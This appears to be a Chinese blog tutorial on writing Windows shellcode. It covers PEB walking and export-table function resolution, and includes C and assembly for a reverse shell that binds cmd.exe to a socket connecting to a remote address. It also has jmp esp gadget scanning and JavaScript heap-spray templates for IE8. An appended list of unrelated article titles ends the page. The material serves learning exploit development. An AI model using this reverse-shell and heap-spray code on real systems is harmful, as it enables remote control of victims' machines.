如何在WIndows下编写一个shellcode?为什么会问这个问题,前段时间在做win下的Exploit,但是都是使用大佬写的shellcode,无法实现个人的一些需求。而网络上编写shellcode的教程大多是关于Linux的,加之顺带学习PE文件结构,所以打算写一篇关于Windows 下shellcode的编写,为要编写Shellcdoe的读者提供一些参考。

摘要:

在C语言中,调用一个函数,编写者无需关心函数地址是如何获取的,所有的操作IDE在进行链接的时候帮助我们完成了。但是在shellcode中,这些操作都需要我们自己去完成,理解PE结构,理解函数表,这些都是shellcode编写最有魅力的一部分。

本文的逻辑首先是从C代码着手,学习如何使用汇编重现的基础,编写一个无移植性的shellcode作基础引导。在掌握了硬编码编写之后,通过掌握获取函数导出表,编写能够在所有Windows版本上运行的通用shellcode。

这篇文章时间跨度比较久远,起笔还是暑假在贵阳的时候,后来做了一段时间WEB安全,这篇文章便写了一小半就烂尾了。后来投入到Win/Browser下漏洞的怀抱中(最近又回Ubuntu了,渣男。出戏:陆司令:何书桓!你在我的两个女儿之间跳来跳去,算什么东西!),需要在WIN7下做一些自定义shellcode,自己之前自定义的shellcode居然无法在WIN7下运行,于是想起这篇未完工的文章,借此对shellcode编写做一次总结与复习。

0x00 创建自己的SC实验室

当我们创建自己的shellcode实验室时候,我们必须清楚无论是自己编写的,亦或者是网络上获取的shellcode,我们都需要对其的行为有一个深刻的了解。

首先是安全性,要做的就是在一个相对安全的环境下进行测试(例如虚拟机),以保证不会被黑吃黑。

其次,这个测试方法要足够方便。不能将shellcode随意的扔到自己写的Exploit中进行测试,因为大多数Exploit对shellcode的格式要求是非常严格的,尤其是栈溢出方面的漏洞。初期编写的shellcode可能包含大量Null字节,容易被strcpy截断。(比如笔者写的shellcode基本都通不过栈溢出的测试。。汗,一般直接扔到Browser的Exploit里)

下面是我们的shellcode调试环境,如果是WIN7以后的版本需要将DEP选项关闭。

Shellcode-lab

调试一段shellcode环境:windows xp sp0编译器:VC++6.0

char shellcode[]="xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"

0x01从C到shellcode

shellcode大多是包含很多恶意行为的代码,就如它名字由来的那样 “获取shell的代码”。

但是在漏洞大多数复现中,我们需要做的仅仅是证明自己能够利用,所以我们编写的shellcode需要满足无害性和可见性。例如弹出一个计算器,或者如下面的C代码一样,让Exploit弹出一个极具个人风格的MessageBox也是一个不错的选择。

C实现非常简单,只需要调用MessageBox函数,写入参数。

#includeint main(int argc,char** argv){    MessageBox(NULL,"You are hacked by Migraine!","Pwned",MB_OK);}

放入IDA,查找到Main函数的位置。
可以查看反汇编,四个参数分别PUSH入栈,然后调用MessageBoxA
MSDN对MessageBox的描述

放入IDA,查找到Main函数的位置。
可以查看反汇编,四个参数分别PUSH入栈,然后调用MessageBoxA
MSDN对MessageBox的描述

int MessageBox( HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaptioUINT uType );

在OD中下断点调试,得到同样的结果。

基于调试可知,MessageBoxA从USER32.DLL加载到内存的地址为0x77D3ADD7

当然这个地址是非常不稳定的,受到操作系统版本还有很多因素(例如ASLR)的影响
不过为了简便shellcode,目前将这部分先放一放。

在我们编写的另一个程序中(见下文),发现这个函数依旧被映射到了同一个位置
因为XP没有开启ASLR的缘故,DLL加载的基地址不会变化
值得注意的是该程序需要调用USER32.DLL,否则需要手动LoadLibrary

但是现在这段C生成的代码,直接提取字节码是行不通的。
函数的参数被放在了该程序的Rodata段中调用,与地址无关的段。
而我们要求shellcode能在任何环境下运行,需要保证参数可控,即需要将参数入栈,然后再调用。

接下来用汇编重写一遍(C嵌入asm)
通过自己将数据入栈,然后调用MessageBoxA

#includevoid main(){    LoadLibrary("user32.dll");//Load DLL    __asm    {push 0x00656e;nepush 0x69617267;graipush 0x694d2079;y Mipush 0x62206565;ed bpush 0x6b636168;hackpush 0x20657261;Arepush 0x20756F59;You        mov ebx,esppush 0x0push 0x656e6961;ainepush 0x7267694d;Migr        mov ecx,esp        //int MessageBox( HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption,UINT uType );xor eax,eaxpush eax//uTyoe->0push ecx//lpCaption->Migrainepush ebx//lpText->You are hacked by Migrainepush eax//hWnd->0        mov esi,0x77D3ADD7//User32.dll->MessageBoxA        call esi    }}

将ASM提取字节码

再OD中查看这一段ASM

使用UltraEditor查看16进制字节码,然后找到我们的ASM,复制便成功提取了我们的shellcode

68 6E 65 00 00 68 67 72 61 69 68 79 20 4D 69 6865 65 20 62 68 68 61 63 6B 68 61 72 65 20 68 596F 75 20 8B DC 6A 00 68 61 69 6E 65 68 4D 69 6772 8B CC 33 C0 50 51 53 50 BE D7 AD D3 77 FF D65F 5E 5B 83 C4 40 3B EC E8 97 3B FF FF

调整一下格式,便获取到了shellcode

char shellcode[]="x68x6Ex65x00x00x68x67x72x61x69x68x79x20x4Dx69x68""x65x65x20x62x68x68x61x63x6Bx68x61x72x65x20x68x59""x6Fx75x20x8BxDCx6Ax00x68x61x69x6Ex65x68x4Dx69x67""x72x8BxCCx33xC0x50x51x53x50xBExD7xADxD3x77xFFxD6""x5Fx5Ex5Bx83xC4x40x3BxECxE8x97x3BxFFxFF";

放入上文搭建的shellcode调试环境,添加LoadLibrary(“user32.dll”);以及头文件#include

在WInodws xp下运行效果理想

优化shellcode

去除null字节

这里使用xor配合sub就能够完全去除null,还有一些其他方法,使用16位寄存器避免null字节,在《exploit编写教程》上面都有详细的介绍,就不再重复造轮子了。

__asm    {/*使用sub来替换/x00*/        mov eax,0x1111767f        sub eax,0x11111111        push eax//push 0x0000656e;ne        push 0x69617267;grai        push 0x694d2079;y Mi        push 0x62206565;ed b        push 0x6b636168;hack        push 0x20657261;Are        push 0x20756F59;You        mov ebx,esp/*使用xor来替换/x00*/xor eax,eax        push eax//push 0x0        push 0x656e6961;aine        push 0x7267694d;Migr        mov ecx,esp//int MessageBox( HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption,UINT uType );xor eax,eax        push eax//uTyoe->0        push ecx//lpCaption->Migraine        push ebx//lpText->You are hacked by Migraine        push eax//hWnd->0        mov esi,0x77D3ADD7//User32.dll->MessageBoxA        call esi    }

此时生成的shellcode就不存在x00了

0x02编写更稳定Shellcode

如何提高shellcode 的可移植性一直是一个需要我们在一的问题。

前文我们编写的MessageBoxA的地址是硬编码的,导致这段shellcode只能利用于windows xp sp0。

但是Windows并不支持像Linux那样的int 0x80中断呼叫函数的操作,于是唯一的方法就是通过PE文件中的函数导出表获取函数此刻的地址,这个方法在提高可移植性的同时,还可以一劳永逸地解决ASLR带来的地址偏移问题。

1. 动态定位kernel32.dll

不同版本的操作系统,kernel32.dll的基地址也是不同的。Windows没有linux那样方便的中断机制来调用系统函数,所以只能通过基址+偏移地址来确定函数的位置。

通过PEB获得基址

我们可以通过Windbg解析PEB(WindowsXP符号表已经不再支持自动下载)

所以手动下载安装WindowsXP-KB936929-SP3-x86-symbols-full-ENU.exe

但是碰到一些问题,所以在Windows10下用Windbg(x86)进行PEB分析

使用windbg加载任意一个x86程序,会出现break,等待到出现int 3即可进行操作

!peb可以自动分析,可以查询到KERNEL32.DLL的地址。

PEB是进程环境块,由TEB线程环境块偏移0x30字节。我们这里需要直到查找地址的原理。
大概流程是通过FS段选择器找到TEB,通过TEB找到PEB,然后获取kernel和ntdll的地址。
接下来我们在windbg中,来手工实现PEB结构分析,之后会使用汇编完成Kernel基址的读取。
查看PEB结构

直接查看LDR结构

偏移0xc,选择InLoadOrderModuleList
查看这个_LIST_ENTRY结构

_LIST_ENTRY 是一个存放双向链表的数据结构(包含于_LDR_DATA_TABLE_ENTRY)
_LDR_DATA_TABLE_ENTRY是存放载入模块信息的结构,并且是由_LIST_ENTRY这个双向链表串联起来。
由三种串联方式,区别仅在于排列顺序(上文我们偏移0x14选择InMemoryOrderModuleList )

   +0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x51c00 - 0x78f6b88 ]   +0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x51c08 - 0x78f6b90 ]   +0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x51c90 - 0x78f6b98 ]

第一个_List_ENTRY指向的地址是0x51c08(因为InMemoryOrderModuleList的指针指向的是下一个结构的InMemoryOrderModuleList,而不是_LDR_DATA_TABLE_ENTRY的结构头,需要偏移0x8)

查看对应的_LDR_DATA_TABLE_ENTRY结构,得知这是iexplore.exe(调试的宿主程序)的基地址为0x01120000(DLLBase)

接下来顺着LIST_ENTRY,往下寻找结点。发现kernel在第三个结点。

查看这个地址的_LDR_DATA_TABLE_ENTRY结构
通过这两次观察,可以发现,实际上这个结构体的第一个结构就是_List_ENTRY,负责将这些_LDR_DATA_TABLE_ENTRY结构串联成链表。
偏移0x18可以得出DllBase为0x77e10000

成功获取Kernel的基地址。
用接下来用汇编实现kernel地址的读取
原理是在InMemoryOrderModuleList结构中,kernel位置固定为第三个。

global CMAINCMAIN:mov ebp, esp; for correct debuggingxor ebx,ebxmov ebx,[fs:0x30] ;TEB+0x30->PEBmov ebx,[ebx+0xc] ;PEB+0xc->LDRmov ebx,[ebx+0x14] ;LDR+0x14->InMemoryOrderModuleList-->_LIST_ENTRY第一个节点->??.dllmov ebx,[ebx] ;-->_LIST_ENTRY第二个节点->ntdll.dllmov ebx,[ebx] ;-->_LIST_ENTRY第三个节点->Kernel.dllmov ebx,[ebx+0x10]; DllBase偏移0x18减去指向偏移0x8;下文会详细分析xor eax, eaxret

使用SASM调试,在结尾下断点,发现ebx已经成功赋值为了kernel的地址,与windbg显示的一致。(此处的汇编代码是之前在另一台机器上做的实验,所以kernel地址不同,希望不要引起争议)

使用命令!peb

如果需要在VS下编译,也可采用内联汇编实现。

int _tmain(int argc, _TCHAR* argv[]){int kernel32=0;    _asm{xor ebx,ebx    mov ebx,fs:[0x30]    mov ebx,[ebx+0xc]    mov ebx,[ebx+0x14]    mov ebx,[ebx];ntdll    mov ebx,[ebx];kernel    mov ebx,[ebx+0x10];DllBase    mov kernel32,ebx    }printf("kernel32=0x%x",kernel32);    getchar();return 0;}

上述代码中(SASM),比较需要注意的第15行为ebx+0x10而不是0x18(_LDR_DATA_TABLE_ENTRY结构中标准的DllBase偏移)
主要原因是InMemoryOrderLinks的指针指向的是下一个_LDR_DATA_TABLE_ENTRY的InMemoryOrderLinks(结构偏移0x08),所以需要该地址减去-0x8才是正确的文件头(图中案例0x954dd0-0x8)
所以当ebx存放InMemoryOrderLinks的指针时,要获取DllBase需要偏移0x18-0x8=0x10

至此我们已经获取到了kernel32.dll的基地址,获取这个地址的方法还有很多方法,使用SEH、TEB都可以间接获取Kerne32的地址,如果有需要可以参考《Exploit编写系列教程》。还有需要注意的是不同系统下,某些获取方法可能会失效,这次实验的测试环境(Win7)下的寻址就和之前的系统有一些不同,所以可能不会向前兼容,不过通过windbg对单个系统进行符号调试,是很容易发现区别的并且修改方案。

2. 获取函数地址

在理解这部分之前,我们首先需要对PE格式有一定的了解。就从我们刚才获取了基地址的Kernel32作为基础,一步步看如何获取系统API函数的地址。

首先从DOS头开始,Windbg能够使用符号表来对地址进行解析。
解析_IMAGE_DOS_HEADER结构,我们只需要了解e_lfanew字段,指向PE头,该字段在在DOS头偏移0x3c的位置。

之前的kernel基址加上e_lfanew字段的偏移(0n开头表示十进制)是指向PE头的指针。

获取了PE头指针,我们即可以使用windbg解析PE头的_IMAGE_NT_HEADERS结构
_IMAGE_FILE_HEADER 是一个结构体,包含代码数目、机器类型以及特征等信息。
而我们这里需要使用的结构体是_IMAGE_OPTIONAL_HEADER

继续利用windbg分析,经过两次分析,现在的读者应该也已经轻车熟路了。

分析_IMAGE_OPTIONAL_HEADER,其包含以下几个信息。

很显然,偏移0x60的DataDirectory段就是函数导出表的偏移。

AddressOfEntryPoint:exe/dll 开始执行代码的地址,即入口点地址。ImageBase:DLL加载到内存中的地址,即映像基址。DataDirectory-导入或导出函数等信息。

继续解析这个结构,终于获取到了这个结构到VA。

因为我们之前的解析都没有用到指针,所以可以一起算VA偏移PE头一共0x78字节(240是PE偏移DOS,是动态获取)

获取到DATA DIRECTORY结构到VirtualAddress地址
我们关心的主要有三个数组结构

AddressOfFunctions:指向一个DWORD类型的数组,每个数组元素指向一个函数地址。AddressOfNames:指向一个DWORD类型的数组,每个数组元素指向一个函数名称的字符串。AddressOfNameOrdinals:指向一个WORD类型的数组,每个数组元素表示相应函数的排列序号

AddressOfNames的结构是一个数组指针,每个机器位(4字节)都指向一个函数名的字符串。
所以我们可以通过遍历这个数组,结合字符串匹配获取到该函数的序号。

AddressOfNameOrdinals存放这对应函数的索引值,在获取了函数的序号之后,按照序号查找函数索引值。
需要注意的是每个索引值占2字节。
例如第三个函数ActivateActCtx函数的索引值为4

AddressOfFunctions则根据索引排序,存放着函数的地址。
地址加上0x10[索引4字节*指针4字节]存放ActivateActCtx函数的偏移地址。

我们使用汇编来实现这一过程,接着上面的汇编代码,此时的EBX存放Kernel32的地址。

;从Kernel32的PE头,获取DATA DIRECTORY的地址        ;Get address of GetProcessAddress        mov edx,[ebx+0x3c] ;DOS HEADER->PE HEADER offsetadd edx,ebx ;PE HEADER        mov edx,[edx+0x78] ;EDX=DATA DIRECTORYadd edx,ebx ;EDX=DATA DIRECTORY;将字符串与AddressOfNames    数组匹配,获得函数的序号        ;compare string         xor ecx,ecx        mov esi,[edx+0x20]add esi,ebxGet_Func:        inc ecx        lodsd ;mov eax,esi;esi+=4add eax,ebx;        cmp dword ptr[eax],0x50746547 ;GetP        jnz Get_Func        cmp dword ptr[eax+0x4],0x41636f72;proA        jnz Get_Func        cmp dword ptr[eax+0x8],0x65726464 ;ddre        jnz Get_Func    ;通过序号在AddressOfNameOrdinals中获取索引        ;get address        mov esi,[edx+0x24] ;AddressOfNameOrdinalsadd esi,ebx        mov cx,[esi+ecx*2];num        dec ecx;通过索引在AddressOfFunctions中获取函数地址,存放于EDX        mov esi,[edx+0x1c];AddressOfFunctionsadd esi,ebx        mov edx,[esi+ecx*4]add edx,ebx ;EDX = GetProcAddress

此时我们已经获取了GetProcAddress函数的地址,所有关于PE文件的内容到这里也就结束了,之后我们就可以想C语言一样非常容易地调用一个函数。我们已经度过了编写shellcode最黑暗的过程,接下来迎接着我们的将是一条康庄大道。

通过GetProcAddress,我们首先可以使用获取LoadLibrary函数的地址,该函数可以用来加载user32模块,同时获取其基地址。这部分就比较简单了,直接贴代码。

;Get LoadLibraryxor ecx,ecxpush ebx ;Kernel32 入栈备份push edx ;GerProcAddress 入栈备份push ecx ;0push 0x41797261 ; aryApush 0x7262694c ; Librpush 0x64616f4c ; Loadpush esp;"LoadLibraryA"push ebx ;        call edx ;GerProcAddress(Kernel32,"LoadLibraryA")        add esp,0xc ;pop "LoadLibraryA"pop ecx; ECX=0push eax ;EAX=LoadLibraryApush ecx        mov cx, 0x6c6c  ; llpush ecxpush 0x642e3233 ; 32.dpush 0x72657375 ; userpush esp        ; "user32.dll"        call eax        ; LoadLibrary("user32.dll")

到这里,有一定汇编和WIN32基础的读者已经可以编写shellcode逻辑了,思路即通过GetPrcAddress函数获取需要的函数地址,能结合完成各项功能,剩下的部分就需要读者发挥自己天才的想象力了。

文末会提供一个完整编写的shellcode作为案例。

0x03三种经典的shellcode形式

Shellcode在功能性上的实现,主要分为以下三大类
分别是下载恶意文件执行、程序本身捆绑文件还有直接反弹shell获得控制权
在内核层面则还有提权等操作,这里只对应用层shellcode功能实现做一个归类。

(1)下载执行

调用URLDownloadToFile函数下载恶意文件到本地,并且使用Winexec执行
函数原型

HRESULT URLDownloadToFile(LPUNKNOWN pCaller,LPCTSTR szURL,LPCTSTR szFileName,_Reserved_ DWORD dwReserved,LPBINDSTATUSCALLBACK lpfnCB);

(2)捆绑

通过GetFileSize获取文件句柄,获取释放路径(GetTempPathA),设置好文件指针(SetFilePoint),使用VirtualAlloc在内存中申请一块内存,再将数据读取(ReadFile)写入到本地文件(CreateFIle WriteFile),最后在对该文件执行。

(3)反弹shell

反弹shell属于无文件攻击,使用socket远程获得对方的cmd.exe。优点是不容易留下日志,适合渗透测试中使用,缺点也很明显,维持连接的稳定性较差。

在Windows下实现反弹shell,比Linux多了一个步骤,启动或者初始化winsock库,之后创建cmd.exe进程然后TCP连接端口/打开监听方法都是相近的。

需要注意的使用C编程可以使用Socket结合双管道进行通信,但是用汇编管道编写比较麻烦。不建议使用管道来进行通信。解决方案是使用WSASocket代替Socket,这个函数支持IO重叠。

函数原型

SOCKET WSASocket (  int af,  int type,  int protocol,  LPWSAPROTOCOL_INFO lpProtocolInfo,  GROUP g,  DWORD dwFlags  );

这里我们主要针对第三种功能,实现一个无管道的反弹shell代码。
因为篇幅较长,这里使用C++实现,接下来只需要用汇编调用函数实现即可。
本部分参考博客:https://blog.csdn.net/PeterZ1997/article/details/79448916

实现环境

WIN7 SP1
VS2010

首先实现一个TCP连接,使用nc做连接测试。

WSASocket的使用与Socket基本一致,多出来的参数设置为NULL即可。

包含头文件WinSock2.h和winsock.h

//初始化WSA套接字WSADATA wsd;    WSAStartup(0x0202,&wsd);    SOCKET socket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);    SOCKADDR_IN sin;sin.sin_addr.S_un.S_addr=inet_addr(REMOTE_ADDR);sin.sin_port=htons(REMOTE_PORT);sin.sin_family=AF_INET;//连接远程的服务端,发送验证代码    connect(socket,(sockaddr*)&sin,sizeof(sin));    send(socket,"[+]Hello!n",strlen("[+]Hello!n"),0);接下来将使用CreateProcess为cmd.exe创建子进程,然后将标准输入、标准输出、标准错误输出都绑定到socket上。(这部分在Linux下实现比起Windows就简单多了,可以直接重定向)//创建cmd进程    STARTUPINFO si;    PROCESS_INFORMATION pi;    GetStartupInfo(&si);    si.cb=sizeof(STARTUPINFO);    si.hStdInput=si.si.hStdOutput=si.hStdError=(HANDLE)socket; //将标准输入输出绑定到Socket    si.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;    si.wShowWindow=SW_HIDE;    TCHAR cmdline[255]=L"cmd.exe";while(!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)){ //创建进程,第五个参数TRUE子进程继承父进程的所有句柄    Sleep(1000);    }    WaitForSingleObject(pi.hProcess, INFINITE);    CloseHandle(pi.hProcess);    CloseHandle(pi.hThread);

在汇编编写中,可以讲首先计算出关键函数和DLL的基地址并且放入栈帧,方便随时调用。

socket类的函数(WSAStartup、connect)如果执行成功EAX会返回0,如果失败会返回-1(0xFFFFFFFF)

以上程序实现函数的来源

Kernel32.dll

CreateProcessAGetStartupInfoALoadLibraryA

ws2_32.dll

WSAStartupWSASocketAconnect

使用汇编编写

初始化部分(代码量较大,仅做参考,速读的读者可以暂时跳过这部分)

nop        nop        nop        ;get the address of kernel32.dllxor ecx,ecx        mov eax,fs:[0x30];EAX=PEB        mov eax,[eax+0xc];EAX=PEB->LDR        mov esi,[eax+0x14];ESI=PEB->Ldr.lnMemOrder        lodsd     ;mov eax,[esi];esi+=4;EAX=SecondMod->ntdll        xchg eax,esi        lodsd    ;EAX=ThirdMod->kernel        mov ebx,[eax+0x10] ;EBX=kernel->DllBase        ;Get address of GetProcessAddress        mov edx,[ebx+0x3c] ;DOS HEADER->PE HEADER offset        add edx,ebx ;PE HEADER        mov edx,[edx+0x78] ;EDX=DATA DIRECTORY        add edx,ebx ;EDX=DATA DIRECTORY        ;compare stringxor ecx,ecx        mov esi,[edx+0x20]        add esi,ebxGet_Func:        inc ecx        lodsd ;mov eax,esi;esi+=4        add eax,ebx;        cmp dword ptr[eax],0x50746547 ;GetP        jnz Get_Func        cmp dword ptr[eax+0x4],0x41636f72;proA        jnz Get_Func        cmp dword ptr[eax+0x8],0x65726464 ;ddre        jnz Get_Func        ;get address        mov esi,[edx+0x24] ;AddressOfNameOrdinals        add esi,ebx        mov cx,[esi+ecx*2];num        dec ecx        mov esi,[edx+0x1c];AddressOfFunctions        add esi,ebx        mov edx,[esi+ecx*4]        add edx,ebx ;EDX = GetProcessAddress;EDX=GetProcAddr;EBX=kernel32        ;get CreateProcess addressxor ecx,ecxpush ebx ;Kernel32push edx;GetProcAddr        mov cx,0x4173;sApush ecx ;sApush 0x7365636F;ocespush 0x72506574;tePrpush 0x61657243;Creapush esp ;"CreateProcessA"push ebx        call edx;GetProcAddr("CreateProcessA")        add esp,0x10 ;clean stackpush eax ;CreateProcessA        ;CreateProcessA         ;GetProcAddr 4

在执行call之后,你的服务器会得到一个windows的反弹shell。生成Unicode码之后,继续用可怜的IE8来做实验。

 0x04 shellcode布置技术

我们知道在栈溢出中,可以将shellcode布置在栈空间的不同位置,同样在实际漏洞利用中,尤其在栈溢出已经落寞的今天,堆利用中,布置shellcode方法更是层出不穷,笔者也无法将所有的方案汇总全面,就仅对目前常见的几种布置技术做个总结。

Jmp esp /ROP

在Windows中使用jmp esp(跳板技术)的频率远远高于linux(虽然这种技术在linux下也可用),比起将shellcode放在ret地址后面,将shellcode放在栈顶能有效减少空间。通过调用jmp esp将程序跳转到shellcode。

虽然在DEP和ASLR盛行的年代,这个技术也早已不再有用武之地。但除了对于研究历史漏洞帮助,该技术还是引入ROP这个概念的一个前置知识,在学习了ROP之后,你会忽然领悟的。

这次让我们放下windbg,自己动手编程实现寻找jmp esp

编程实现寻找gadget

以jmp esp为案例,寻找user32.dll中的所有jmp esp地址。

#include "stdafx.h"#include#define DLL_Name "user32.dll"int _tmain(int argc, _TCHAR* argv[]){    HINSTANCE handle=LoadLibraryA(DLL_Name);if(!handle){printf("load dll errorn");exit(0);    }printf("Load success...n");    BYTE *ptr=(BYTE*)handle;    BOOL flag=false;for(int i=0;!flag;i++)    {try{if(ptr[i]==0xFF&&ptr[i+1]==0xE4) //JMP ESP的十六进制码=0xFFE4printf("ttptr->jmp esp = 0x%xn",((int)ptr+i));        }catch(...)        {int address=(int)ptr+i;printf("END OF 0x%xn",address);            flag=true;        }    }return 0;}

使用ROP绕过DEP

ROP技术是用于绕过栈不可执行(其实现在的堆也不可执行咯),什么是ROP技术。其实之前的jmp esp已经引出了ROP的基础理念,即使用程序自身text段的机器码执行。

ROP的全程面向返回语句的编程,一个个gadgets串联起来的链叫做ROP链。每个gadgets的格式大概为“ 指令 指令 ret”,通过ret命令将所有的gadgets串联起来。

如果说jmp esp是一个跳板就直指靶心,那么ROP就是经过好多跳板,分步骤完成自己的命令。

常见的绕过DEP的案例,就是通过ROP实现VirtualProtect来对shellcode所在内存修改属性(相当于关闭DEP),将其修改为可执行,再通过JMP R32来跳转执行Shellcode。

具体案例可以参考我之前写的对IE浏览器写的Exploithttps://www.anquanke.com/post/id/190590

HeapSpray

堆喷射是一种shellcode布置技术,常常借助javascript等脚本语言实现,所以常见于浏览器漏洞。

上古的堆喷射

在Windows XP SP3以前,Windows下大部分程序都不会默认开始DEP(或者不支持),只需要构建nop(大量)+shellcode的内存块,使用javascript申请200MB的内存空间,能够覆盖内存的大量空间。只要控制程序流跳转到类似0x0c0c0c0c(也可以是其他位置,只要足够稳定就行)这样就会顺着nops一路滑到shellcode并且执行。

参考代码

<script language="javascript">shellcode="u1234u1234u1234u1234u1234u1234u1234u1234u1234u1234u1234u1234";var nop="u9090u9090";while(nop.length<=0x100000/2){    nop+=nop;}nop=nop.substring(0,0x100000/2-32/2-4/2-shellcode.length-2/2);//nop=nop.substring(0,0x100000-32/2-4/2-2/2);var slide=new Array();for(var i=0;i<200;i++){    slide[i]=nop+shellcode;//    slide[i]=nop;}script>

精确堆喷射

在Windows进入后DEP时代,面临DEP和ASLR的双重防线,DEP导致堆中的数据无法执行,之前布置大量数据以量取胜的战术失去了意义。于是heap-feng-shui(堆风水)技术被提出。

通过堆风水,我们申请0x1000个0x80000大小的堆块。分配量足够大,导致堆块中的每0x1000个小的片的开始地址都是固定,通常为0xYYYY020。

因此我们能够将ROP链的头部稳定对齐末尾固定的四字节(例如0xYYYY0050)。这样就能构成某种意义上的精确喷射。

参考文献:http://www.phreedom.org/research/heap-feng-shui/heap-feng-shui.html

IE8下的参考代码(shellcode喷射对齐0x0c0c0c0c)

<html><head><title>title>head><body><script type="text/javascript">    var sc="u4141u4141u4141u4141u4141u4141u4141u4141u4141u4141u4141u4141u4141u4141";    var nop="u0c0cu0c0c";    var offset=0x5ee-4/2;//0xbdc/2-4/2    //以0x10000为单位的shellcode+nop结构单元    while(nop.length<0x10000)        nop+=nop;    var nop_chunk=nop.substring(0,(0x10000/2-sc.length)); //Unicode编码,所以0x10000/2个字节    var sc_nop=sc+nop_chunk;    //组合成单个大小为0x80000的堆块(heap-feng-shui)    while(sc_nop.length<0x100000)        sc_nop+=sc_nop;    sc_nop=sc_nop.substring(0,(0x80000-6)/2-offset);//组合成0x800000的堆块    var offset_pattern=nop.substring(0,offset);    code=offset_pattern+sc_nop;    heap_chunks=new Array();    for(i=0;i<1000;i++)    {        heap_chunks[i]=code.substring(0,code.length);    }script>body>html>

参考文献:

[1]peter.《Exploit编写教程》[OL/DB],2010

[2]《现代化windows漏洞程序开发》[OL/DB],2016

[3]Failwest.《0day安全》[M].电子工业出版社,2011

[4]PEB手工分析

[5]WinXp符号表不支持解决方案

[6]https://blog.csdn.net/x_nirvana/article/details/68921334

[7]https://blog.csdn.net/hgy413/article/details/7422722

windows 弹shell_一步步学写Windows下的Shellcode相关推荐

  1. 64位虚拟机下asm()语法_一步步学写Windows下的Shellcode

    如何在WIndows下编写一个shellcode?为什么会问这个问题,前段时间在做win下的Exploit,但是都是使用大佬写的shellcode,无法实现个人的一些需求.而网络上编写shellcod ...

  2. 学写Windows Service

    记得很早之前,一个同事要写一个定时任务,先要在一条新闻在到达设定期限时 由程序自动删除 可以一直没有思路 问我 我也没有好的办法 后来,我在前段时间找到一个 方法:http://www.cnblogs ...

  3. C语言能否写windows应用程序,C语言能写windows的窗口吗?

    该楼层疑似违规已被系统折叠 隐藏此楼查看此楼 //下面是一个WIN32 API写的窗体,是不是C写的?你觉得... #include LRESULT CALLBACK WndProc(HWND hwn ...

  4. windows java eclipse_从零开始学 Java - Windows 下安装 Eclipse

    三观是什么鬼 当我们在讨论「三观一致」的时候是在讨论些什么? 我认为这个世界上本没有「三观」这一说法,说的人多了,也就有了「三观」这个词,当我们讨论「三观一致」其实并不是真的在说世界观.价值观.人生观 ...

  5. 一步步将Windows 10装入移动硬盘中(不用Windows To Go)

    众所周知,Windows是不可以直接装在移动硬盘中的,我们可以利用Windows To Go来操作.但是Windows To Go是企业版的功能,家庭版的用户只能用第三方工具.找不找得到先不说,谁知道 ...

  6. win7 java注册表_使用JAVA和JNA在64位Win 7上读/写Windows注册表

    我正在尝试使用JAVA在64位Win7上读/写 Windows注册表. 首先,我尝试了JDK java.util.prefs.Preferences and its reflection usage. ...

  7. c#写windows服务

    创建一个Windows服务总体步骤如下: 按照Windows Service模板创建项目 添加定时器(timer)或者其它控件,并编写OnStart和OnStop事件方法 protected over ...

  8. C#写Windows Service(windows服务程序)

    背景:        要学习使用一个新东西,我们必须知道他是个什么东西.对于我们此次研究的windows服务来说,他又是个什么东西,其实也没有什么高深的了. windows service概述: 一个 ...

  9. 无法启动计算机打印机服务程序,安装驱动程序时电脑弹出错误窗口“无法启动Windows打印后台程序服务” (适用于Windows OS)...

    文档标题:安装驱动程序时电脑弹出错误窗口"无法启动Windows打印后台程序服务" (适用于Windows OS) 文档代码:CHN-FP0117-1 最近修改日期:2020年11 ...

  10. windows linux 共享鼠标,Synergy工具 共享Windows系统电脑Linux系统电脑 鼠标键盘

    Synergy1.5.0 免费英文版 类型:行业软件大小:7.1M语言:英文 评分:.9 标签: 立即下载 Synergy是个开源的软件,支持在一个局域网中的多台电脑之间共享鼠标键盘,支持Window ...

最新文章

  1. 《评人工智能如何走向新阶段》后记(再续9)
  2. 1.20(设计模式)模板模式
  3. Flink 集群搭建安装 CentOS 7.x 版本
  4. 【OpenCV】OpenCV函数精讲之 -- imread()函数
  5. 微信小程序手动获取自己位置wx.chooseLocation
  6. web简单静态页面设计【HTML+CSS】
  7. ipmitool配置管理网络
  8. DAY02 pat乙级刷题(c++代码)
  9. Final Cut Pro X Guru: Advanced Trimming Final Cut Pro X Guru:高级修剪 Lynda课程中文字幕
  10. linu快速删除文件
  11. 仿QQ计步器效果的实现
  12. Uniapp返回上一页触发页面更新
  13. 电商直播风暴来了,AI虚拟偶像彻底革命李佳琦、薇娅?
  14. ios状态栏,导航栏,工具栏,tab栏的位置,附图
  15. Auto-Rig Pro文档翻译:安装
  16. C++中未定义标识符ULONG,UINT的报错解决方法 VS2019
  17. receptive field,即感受野
  18. OpenJudge-魔兽世界终极版
  19. 选下拉框的的值对应上传相应的图片_excel表格下拉菜单调用对应数据,如何在excel中实现,选择下拉菜单某一项,该表格中就出现选项对应的数据?...
  20. [Unity][ILRuntime][C#]热更新运行官方示例U3D项目报错

热门文章

  1. php中的字典数据类型,python中字典数据类型常用操作
  2. oracle数据库左链接,Oracle数据库中的左连接与右连接
  3. 基于python的数据挖掘实验报告_数据挖掘实验报告
  4. 微信爬虫服务器,为什么现在那么多爬虫,却没有爬取微信公众号文章的案例?...
  5. cad高程标注插件lisp_CADLISP程序,标高修改,管网标注,等一堆
  6. ansys与solidworks关联失败,将SolidWorks模型导入ansys划分网格总是提示错误
  7. 2021级南航计算机专硕829备考记录
  8. Mat拜耳数据邻域转换算法返回Mat对象,16bit三通道
  9. 图书管理系统(数据库)
  10. Matlab中CIC滤波器的应用